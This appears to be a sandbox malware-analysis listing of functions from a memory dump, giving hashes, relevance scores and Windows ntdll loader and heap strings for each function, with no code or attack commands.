Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 4ebf7d0d7b5d58fb58863e72a5b4b9171012043f0bb135e01ad1f343e940868e
Instruction ID: 5a103607fb7acfe6f5db095d844314d97ee493f82c4fabe8242cb0feacd81982
Opcode Fuzzy Hash: 4ebf7d0d7b5d58fb58863e72a5b4b9171012043f0bb135e01ad1f343e940868e
Instruction Fuzzy Hash: D7A19F719116299BDB31EF68CC88BEAB7B8EF44700F1041E9EA09A7250D7359EC5CF54

Function 01650BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0169A10F
LdrpCheckModule, xrefs: 0169A117
minkernel\ntdll\ldrinit.c, xrefs: 0169A121

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 0810de22944124d481e16a8fa975439f32a38661e1f71626d6410f245582c061
Instruction ID: 24fc9e7f2ad8d8a10db0d5ec0b6cebf8eec4b2c45aee4ba3a2a099389218b13c
Opcode Fuzzy Hash: 0810de22944124d481e16a8fa975439f32a38661e1f71626d6410f245582c061
Instruction Fuzzy Hash: D071DE71A002069FDF25DFA8CD81AAEB7F5FB48318F14846DE902A7351E734AD82CB54

Function 01640A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01695342
HEAP[%wZ]: , xrefs: 01695335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0169534D

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: d212b443b3b421693a8627b175ec8dc492d1eece86fec2f8e1b85f32e2dcddf8
Instruction ID: 60118828ab1e5a64887917a718a6ea6aa08abab434930c10012835070f2f0da3
Opcode Fuzzy Hash: d212b443b3b421693a8627b175ec8dc492d1eece86fec2f8e1b85f32e2dcddf8
Instruction Fuzzy Hash: 17617D70600311DFDB29DF28C880BAABBE6FF45704F14855EE95A8B392D771E881CB95

Function 0166C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 016A82DE
Failed to reallocate the system dirs string !, xrefs: 016A82D7
minkernel\ntdll\ldrinit.c, xrefs: 016A82E8

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: ad442f005dee9f8d3d5b998c1c309ca31b8f96aff5f241c864c1921c541c007e
Instruction ID: 773f91d72a5221efc1c2aa93c2d36f06890f233946b78515050b4deb9e3c2944
Opcode Fuzzy Hash: ad442f005dee9f8d3d5b998c1c309ca31b8f96aff5f241c864c1921c541c007e
Instruction Fuzzy Hash: D341DF71544711ABC731EF68DC44B6B7BE9FF48760F04892EFA8993290E774E8018B95

Function 016EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 016EC212
@, xrefs: 016EC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016EC1C5

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 56c3533dafbe3cc0abf971a1e3ed868a0161f709df9169477aa8a19563a13902
Instruction ID: d99623e93f2791ff2da7e3f68c4e16b262ab13ac0559919a9e9304e470b5596b
Opcode Fuzzy Hash: 56c3533dafbe3cc0abf971a1e3ed868a0161f709df9169477aa8a19563a13902
Instruction Fuzzy Hash: C4418272E01219EFDB11DBD8CC95FEEBBF9AB14700F04816AEA09B7240D7749A44CB54

Function 016C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 016C4160
@, xrefs: 016C4225
LdrpResValidateFilePath Exit, xrefs: 016C4172

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 7c5d548c6b4fda88a2ed047db7b90d520d734df81abdb8e5f06b7359fd1f389d
Instruction ID: c6f767f9df05b756ec5a5876de1b6728450e3ee29c47f72c76cf525975d168af
Opcode Fuzzy Hash: 7c5d548c6b4fda88a2ed047db7b90d520d734df81abdb8e5f06b7359fd1f389d
Instruction Fuzzy Hash: F041E572A00258CBEB26DB99CC60BBDBBB6FF95740F14045DD941EB791DB398901CB14

Function 016B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016B4888
LdrpCheckRedirection, xrefs: 016B488F
minkernel\ntdll\ldrredirect.c, xrefs: 016B4899

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 19ea1486018ac41c95fba4c10003f831fc05026f665418ea511044a1bec42a91
Instruction ID: 5bf7627d6ced700a9ac39eeff2fa3c1e0dd1f080b50b4d9480bc834aa17c5c7e
Opcode Fuzzy Hash: 19ea1486018ac41c95fba4c10003f831fc05026f665418ea511044a1bec42a91
Instruction Fuzzy Hash: 6A41C132A046619BCB21CE5CDCC0AA67BE9EF49650B06056DED8A97353DB30E881CB91

Function 01640BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01695449
HEAP: , xrefs: 0169543E
HEAP[%wZ]: , xrefs: 01695431

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 6637ac4e7b41ac381522e577435a3c395ba2fa1cc61343777d7feeb72ba18d1b
Instruction ID: 31b2134ba4a5533491390a767c400e49fba9ab0807a1c703ec37d424fc00d30e
Opcode Fuzzy Hash: 6637ac4e7b41ac381522e577435a3c395ba2fa1cc61343777d7feeb72ba18d1b
Instruction Fuzzy Hash: 3911E4313165519FDB6ACA18CC40BB6B3AAEF40B15F14812EF607CB251DB30D841CB99

Function 016B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 016B20F3
minkernel\ntdll\ldrinit.c, xrefs: 016B2104
LdrpInitializationFailure, xrefs: 016B20FA

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: b073e5a0e72955d3f8431e99659a3c44b7482b1fe78d67b285bd40ad9cb4f381
Instruction ID: 6f91019a3bcca5e258a5f756d6c502f67b437b5d4c5d4d802c29337080164235
Opcode Fuzzy Hash: b073e5a0e72955d3f8431e99659a3c44b7482b1fe78d67b285bd40ad9cb4f381
Instruction Fuzzy Hash: 79F02834640308ABE734EA4CDCA2FDA3BA9EB40B25F14001CFB0167385D2B0A980C750

Function 016403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01694D8A

Strings

#%u, xrefs: 01694D82

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: e983e688c7fff2cacdf01cc165d87aac732fa6792e488dbf0b376a26b919461b
Instruction ID: 9d6b3936c728c4c8ae56b96ae997efa148e4b0f251c6c23f7cab5d8254186f32
Opcode Fuzzy Hash: e983e688c7fff2cacdf01cc165d87aac732fa6792e488dbf0b376a26b919461b
Instruction Fuzzy Hash: AB714772A0115ADFDB01DFA8CD90BAEBBF9BF08304F144069E905A7351EB34E942CB65

Function 0163A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0163AA25
LdrResSearchResource Enter, xrefs: 0163AA13

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: df330b2ef7d2fee4beb60bde634db5e422241e20436eba0609c25671a07e5323
Instruction ID: 0fa1ac709270d09d5e441fdcdcd98771457bae6eb7ed573d3b981f795b65fcd2
Opcode Fuzzy Hash: df330b2ef7d2fee4beb60bde634db5e422241e20436eba0609c25671a07e5323
Instruction Fuzzy Hash: C0E15F71A00219ABEF26CEEDCD94BAEBBBABF84310F104529E941E7351D7349942DB50

Function 016FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 016FA44B
`, xrefs: 016FA551

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 1ce342ccc6aeea194e62df032ee67d8aef414e86bc38fb7eb15cc68068a358d6
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: F8C1BE312043429BEB25CF68CC45B6BBBE6AFC4318F084A2DF69ACB290D775D505CB95

Function 016AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 016AE751
Legacy, xrefs: 016AE75A

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ad96d5974e79df209c32df9112dec11b1f00ef16181401250d1d5d27a5a00908
Instruction ID: 8326a6b868267e4433b5570d0579c4bafc604de7daf77a70ffcc54dc5f243c4b
Opcode Fuzzy Hash: ad96d5974e79df209c32df9112dec11b1f00ef16181401250d1d5d27a5a00908
Instruction Fuzzy Hash: EF613871E006199FDB25DFA88C80AAEBBB9FB44700F55406EE649EB291D732ED01CF54

Function 016D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 016D4437
MUI, xrefs: 016D4525

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 345fcb049661e7bd986190fdb6178bc08b7d7d487442fe946c6b9cee2d190627
Instruction ID: d09fccbffcf3f3065a66969aec7222bbc2be32331080d14c2cfc8f19b7003da9
Opcode Fuzzy Hash: 345fcb049661e7bd986190fdb6178bc08b7d7d487442fe946c6b9cee2d190627
Instruction Fuzzy Hash: EB512871E0021DAFDF11DFA9CC90AEEBBB9EB44754F100529EA11B7690DB309D45CBA4

Function 016304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0163063D
kLsE, xrefs: 01630540

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 27dae35864212f11879aa406d2ab7839654ebb498f9482640fb930cddc1b79cd
Instruction ID: 3dae5fb748f053ef8359b0c62760f73586066d47014463e4ad959cb0cc32a7aa
Opcode Fuzzy Hash: 27dae35864212f11879aa406d2ab7839654ebb498f9482640fb930cddc1b79cd
Instruction Fuzzy Hash: 1E51CF715047428FD725EF68C9406A7BBE8AFC5314F10883EFAAA87381E770D549CB96

Function 0163A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0163A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0163A2FB

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 5428965f4d193f97f174e1029a1ba7ba321d2402972f883d128dec3776afd0fd
Instruction ID: a8b7c0097a96592efff9b4e62e7c5690a146d23659a09b08db64db98031776fe
Opcode Fuzzy Hash: 5428965f4d193f97f174e1029a1ba7ba321d2402972f883d128dec3776afd0fd
Instruction Fuzzy Hash: D141AB31A00655DBEB158F99CC90BAA7BF9FF84304F1440A9E940DB3A5E3B5D941DB40

Function 0166A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0166A5E9
Cleanup Group, xrefs: 0166A5E4

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: c31e3e9ef8b8d7db8eb9ae42a8098abc4db223e944c2d9cc38f25030fb49df27
Instruction ID: b671366103101e4ffb6c0c7546f47038ea073a86c960f5372b61ab533607fe0b
Opcode Fuzzy Hash: c31e3e9ef8b8d7db8eb9ae42a8098abc4db223e944c2d9cc38f25030fb49df27
Instruction Fuzzy Hash: CF01DCB2240740AFD322DF64CD49B2677E8E784B25F00893EF659C7190E334E805CB4A

Function 0163C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0163C8C3, 0163CA40

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 5db5199c7cd349a09ec0266d5f849d79d2d648acb30fd05a4631a7a7f61e5540
Instruction ID: af71e995ae404feb70b6570110860a128ae5938dd95ecc2d2df474298467d18a
Opcode Fuzzy Hash: 5db5199c7cd349a09ec0266d5f849d79d2d648acb30fd05a4631a7a7f61e5540
Instruction Fuzzy Hash: 72824A75E002198FEB25CFA9CC80BEDBBB5BF88710F14816AE959AB351D7309D42CB54

Function 016B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 016B65C1

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4374437c8d97167ee589c8eff0f7e6ac48dbca17f5a3a6c28198349768e41959
Instruction ID: fb63a9c6261497cfc974ca92c2941dc3a86f2d0f26f55fe2f617cc113c02302f
Opcode Fuzzy Hash: 4374437c8d97167ee589c8eff0f7e6ac48dbca17f5a3a6c28198349768e41959
Instruction Fuzzy Hash: BA918572941229AFEB21DF95CC85FEE7BB9EF14B50F104069F600AB291D774AD40CBA4

Function 016DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 016DE1FA

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9fe62e46cef53bfd8b91568f3d36c7eaff66ef287cc3214ad6a953ea78eaa06f
Instruction ID: e92f915324651f91cfbefbf4542cdace715cf3127f2ff690c50742f20b3269ce
Opcode Fuzzy Hash: 9fe62e46cef53bfd8b91568f3d36c7eaff66ef287cc3214ad6a953ea78eaa06f
Instruction Fuzzy Hash: CF91A131E00619BFDB22AFA5DC84FAFBB7AEF55740F110029F501AB250DB769902CB94

Function 0166A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 016A67C9

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: c19b093cc65668df3fb7c2bda08f41ba240b706049aed2819e52657cca8e1d4f
Instruction ID: 4774a35f77c2093ab2162b0b37fba115626726805844ceee44654ddbf38f0ac9
Opcode Fuzzy Hash: c19b093cc65668df3fb7c2bda08f41ba240b706049aed2819e52657cca8e1d4f
Instruction Fuzzy Hash: C0715FB5E0021A8FDF25CF98D9906ADBBB6BF48710F58816EE906A7341E7309D41CF64

Function 016D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 016D4A7F

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 7da65e867d698ae56f87699b3d766b1849822d8056c8e64562582dd892f8eca2
Instruction ID: e8617110821e86373e23091885f3f63297d46852af557c0cba1d4983c24e582b
Opcode Fuzzy Hash: 7da65e867d698ae56f87699b3d766b1849822d8056c8e64562582dd892f8eca2
Instruction Fuzzy Hash: B151A072D0022A9BDF11DF99DC40AAEBBB5AF14A10F09416EEE11BB754DB349C01CBA5

Function 0164E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0164E6A4

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 5c7cf92fe0885a4790975646bc94363885e596d4e797804c1dc703757eb30c23
Instruction ID: b28406f6daf3ed81b333ebde76f12b73418c60041516a289f7310ca0ad11921c
Opcode Fuzzy Hash: 5c7cf92fe0885a4790975646bc94363885e596d4e797804c1dc703757eb30c23
Instruction Fuzzy Hash: E8417F725083129BD711DB69CC80B6BBBE9BF88724F440D2DFA85D7280E779D904C79A

Function 016AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 016AC77F

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: cec7d6a6d8e5a641c68eb5a183b8d3d0437aab08e6f0ab24d4f58979ac0f0e4b
Instruction ID: 1f0f4764036db614088b283bccc8294db34c3e479ae5527c9164c10b8d6b5c0b
Opcode Fuzzy Hash: cec7d6a6d8e5a641c68eb5a183b8d3d0437aab08e6f0ab24d4f58979ac0f0e4b
Instruction Fuzzy Hash: 594145B1D0012DABDB21DA50CC84FDEB77DAB45724F4145E9EB08AB140DB709E89CFA8

Function 016C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 016C6B91

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: d68f555b791bd1c9d937a557ad4c247823650d21b2692359401b6ef7ebe6ffd7
Instruction ID: ddf4a8c50ce3f2dbd36db58de8bc7122594ebbf0360ef201df23c5984cd4ca1a
Opcode Fuzzy Hash: d68f555b791bd1c9d937a557ad4c247823650d21b2692359401b6ef7ebe6ffd7
Instruction Fuzzy Hash: 8731F431A007599BEB22DF69CC54BFE7BA9EF05B04F14406CE941AB382DB75D805CB58

Function 016ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 016ACAA2

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 543117808bb67bd175354428b6fc8859c8a72245585169e42f6382a56e805cff
Instruction ID: 125e99a3acb21a96db74a127478ea4326f2bbc34cda911620358f5980f11e402
Opcode Fuzzy Hash: 543117808bb67bd175354428b6fc8859c8a72245585169e42f6382a56e805cff
Instruction Fuzzy Hash: 7E31013690051AAFEB16DB58CC51EBFBB74EB80720F4141A9EA11AB250D7319E00DBE0

Function 016B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016B895E

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: e9c7245aeff5e7fd61456131b10470fca003036800d442f6efe52a116e9f82fd
Instruction ID: 1cec6dda366518955fdb8a7d293610d297cd293a0e6cb6bccdb8b854e70388b3
Opcode Fuzzy Hash: e9c7245aeff5e7fd61456131b10470fca003036800d442f6efe52a116e9f82fd
Instruction Fuzzy Hash: D301F7B16042219FEB347E5D8CC4AE67BAEEF82664F08042CF64107251CB30A8C2C796

Function 016D2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87633012166dd20c49f17db1a58602bdb65dd0deb649b17eae3fa58472b9e4d
Instruction ID: a9b00f52c9f8d29e60b8c3ff3aba99a6de829a5e5f580ad792a9b5c5198962e3
Opcode Fuzzy Hash: e87633012166dd20c49f17db1a58602bdb65dd0deb649b17eae3fa58472b9e4d
Instruction Fuzzy Hash: 2142C132A083419FD725CF68CCA1A6BBBE6BF88700F49492DFA9297350D771D845CB52

Function 016C8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208887d2179c377a6cbefe293083dada3cb367fe57c61cbb8c844699ece8d869
Instruction ID: 8aacca73fc28cbb7f28f1997090cda9b53f4487e643c1b5cf9706a2e7746e8fd
Opcode Fuzzy Hash: 208887d2179c377a6cbefe293083dada3cb367fe57c61cbb8c844699ece8d869
Instruction Fuzzy Hash: 7A424C75A002199FEB24CF69CC41BADBBFAFF48700F15809DE949AB242D7349985CF50

Function 01642840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31af416b21be86351d24673b0e44b89b9153d6832e72caad606e2c430d23878
Instruction ID: e6277d9e791c168f975de1daf192d9f9212b5f27c5df6e36f8f00450be156969
Opcode Fuzzy Hash: f31af416b21be86351d24673b0e44b89b9153d6832e72caad606e2c430d23878
Instruction Fuzzy Hash: 3132BC70A007568BEF25CF69CC547BEBBFAAF84704F24811DE5869B385D735A842CB90

Function 016DA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60317ab11b5ad3414b431a674b927469602e81e6b8c2dc5281745a156e9c6ec4
Instruction ID: ef0b24bcc3540aaf891ee9a0fa04432513cb9ed5b257405799f64bfbbb64ce05
Opcode Fuzzy Hash: 60317ab11b5ad3414b431a674b927469602e81e6b8c2dc5281745a156e9c6ec4
Instruction Fuzzy Hash: FD22D074A086A1CBEB25CFADC894772BBF1AF44300F08855AE986CF386D775D552CB60

Function 01636A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4798d611e65b48c05a401c21f1bca7a55842e8720c268d8bace652ecbc37bc6
Instruction ID: e96b364365fb4e0a4fc41657fd1d79cc6f4e2ec345624a78d288e3ff41cbf1f6
